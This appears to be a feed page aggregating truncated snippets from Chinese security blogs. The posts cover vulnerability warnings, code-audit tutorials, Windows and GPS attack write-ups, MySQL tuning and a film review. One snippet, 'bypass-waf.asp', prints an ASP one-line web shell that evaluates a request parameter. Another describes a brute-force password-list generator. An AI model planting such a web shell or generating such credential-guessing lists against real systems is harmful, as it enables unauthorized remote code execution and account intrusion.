受影响系统:ShareLaTeX ShareLaTeX <= 0.1.3描述:----------------------------------------------------------...
Seay信息安全博客
代码审计教程:溜客顶级脚本JSP 0day挖掘及代码防
显示不全请点击全屏阅读 代码审计教程:溜客顶级脚本JSP0day挖掘及代码防御系列教程 教程大小:1.04G 教程总量:15课 讲师介绍:360软防研发团队项目部主管safe3 相关链接:http:/...
bypass-waf.asp
<%dim x1,x2x1 = request("pass")x2 = x1eval x2%> <!-- yes++ --><!-- 一句话 pass...
神兵利刃
自定义fuzz规则结合收集的敏感信息跟弱口令top100生成burp爆破用的密码的PHP小脚本
user.txt存放收集到的敏感信息 pass.txt为根据$rule生成的密码 很简单可自行修改成自己使用的脚本 <?php&n...
Mysql
MySQL使用与优化总结
这篇文章总结了工作中用到MySQL的一些常见问题,解决方案;合适的使用场景和优化方案。 存储引擎的选择:MyISAM vs InnoDB MyISAM:支持全文索引;使用表级锁;读并发性能好。 ...
Seay信息安全博客
好剧推荐:微电影《深夜的士》 感受喧嚣都市的
显示不全请点击全屏阅读 地点杭州,深夜零点,细数着在杭州的经历,也才意识到来这边已经一个月。几个小时前,在的士上看到《深夜的士》的宣传片,到家之后...
Seay信息安全博客
漏洞预警:安卓WebView中接口隐患(远程代码执行
显示不全请点击全屏阅读 0x00 背景 在android的sdk中封装了webView控件。这个控件主要用开控制的网页浏览。在程序中装载webView控件,可以设置属性(颜色,字体等)。类似PC下di...
WooYun-Drops
Windows 名称解析机制探究及缺陷利用 – Her0in
http://drops.wooyun.org/papers/10887 本文作为一篇科普文章,阐述了 Windows 系统中的名称解析机制,同时也提及了几种利用名称解析机制的缺陷进行内网攻击的方式。...
WooYun-Zone
如何从github上找漏洞 (WOOYUN)
瞌睡龙 (drops) | 2014-06-09 12:19 之前wooyun上被刷了一批在github上找敏感信息,最终入侵的漏洞。小伙伴有奇思妙想的语句来找到高危漏洞没 :)https://git...
WooYun-Drops
通用GPS卫星定位平台漏洞成灾用户位置信息告急
http://drops.wooyun.org/papers/11765 Author: 0x00 前言 近日,在新闻中曝光了多起通过GPS定位设备,跟踪绑架的事件(http://news.xinhu...
